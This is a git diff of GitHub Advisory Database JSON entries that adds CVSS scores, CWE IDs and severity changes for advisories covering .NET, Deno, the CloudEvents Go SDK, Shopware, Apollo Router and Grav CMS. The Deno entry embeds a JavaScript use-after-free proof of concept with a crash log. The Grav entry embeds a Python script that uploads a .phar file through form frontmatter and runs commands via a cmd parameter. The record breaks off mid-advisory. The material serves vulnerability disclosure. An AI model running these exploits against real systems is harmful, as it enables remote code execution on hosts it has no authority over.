Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 8.0, you should download and install .NET 8.0.2 Runtime or .NET 8.0.102 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you're using .NET 7.0, you should download and install Runtime 7.0.16 or SDK 7.0.116 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.27 or SDK 6.0.419 from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0, .NET 7.0 and, .NET 8.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 7.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at .\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-21386]( https://www.cve.org/CVERecord?id=CVE-2024-21386)\n\n### Revisions\n\nV1.0 (February 13, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-02-13_", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -822,8 +827,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "CRITICAL", + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-02-13T19:49:43Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json index 7b894d7fc37d8..08bb6b80dafb3 100644 --- a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json +++ b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-3j27-563v-28wf", - "modified": "2024-03-06T17:04:40Z", + "modified": "2026-02-17T19:38:52Z", "published": "2024-03-06T17:04:29Z", "aliases": [ "CVE-2024-27934" ], "summary": "*const c_void / ExternalPointer unsoundness leading to use-after-free", - "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2\n", - "severity": [], + "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -41,10 +46,12 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T17:04:29Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:22Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json index b817c8d243bea..7a72186d272b4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json +++ b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-5pf6-2qwx-pxm2", - "modified": "2024-03-12T15:22:22Z", + "modified": "2026-02-17T19:40:16Z", "published": "2024-03-06T20:11:59Z", "aliases": [ "CVE-2024-28110" ], "summary": "Go SDK for CloudEvents's use of WithRoundTripper to create a Client leaks credentials", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2\n", - "severity": [], + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [ { "package": { @@ -52,8 +57,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T20:11:59Z", "nvd_published_at": "2024-03-06T22:15:57Z" diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json index 38ea09ccfe953..0d40371e3ebe4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json +++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-c2f9-4jmm-v45m", - "modified": "2024-03-06T15:06:54Z", + "modified": "2026-02-17T22:02:24Z", "published": "2024-03-06T15:06:54Z", "aliases": [ "CVE-2024-27917" ], "summary": "Shopware's session is persistent in Cache for 404 pages", - "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [], + "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -75,9 +80,9 @@ "cwe_ids": [ "CWE-524" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T15:06:54Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-06T20:15:48Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json index 392aeb4725b74..315f3eb069e6a 100644 --- a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json +++ b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-cgqf-3cq5-wvcj", - "modified": "2024-03-06T18:24:17Z", + "modified": "2026-02-17T19:37:19Z", "published": "2024-03-06T18:24:17Z", "aliases": [ "CVE-2024-28101" ], "summary": "Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", - "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. \n", - "severity": [], + "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -48,9 +53,9 @@ "cwe_ids": [ "CWE-409" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T18:24:17Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:23Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json index cedc93372d406..d074f2bee2ed8 100644 --- a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json +++ b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-f6g2-h7qv-3m5v", - "modified": "2024-03-06T16:58:33Z", + "modified": "2026-02-17T19:39:34Z", "published": "2024-03-06T16:58:33Z", "aliases": [ "CVE-2024-27923" ], "summary": "Remote Code Execution by uploading a phar file using frontmatter", - "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n", - "severity": [], + "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video 